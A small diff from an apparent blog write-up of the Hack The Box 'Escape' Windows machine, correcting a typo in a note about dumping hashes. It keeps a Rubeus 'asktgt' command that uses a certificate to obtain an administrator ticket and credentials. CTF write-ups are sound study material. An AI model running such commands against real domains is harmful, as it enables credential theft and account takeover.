umarbaevB/umarbaevB.github.io/content/posts/cybersecurity/hackthebox/machines/windows/escape/index.md

 ![](./images/21.png)
 ![](./images/22.png)

-- Note: Looks like there was a way to do dump the hashes from `evil-winrm`
+- Note: Looks like there was a way to dump the hashes from `evil-winrm`
   - `.\Rubeus.exe asktgt /user:administrator /certificate:<Certificate> /getcredentials /show /nowrap`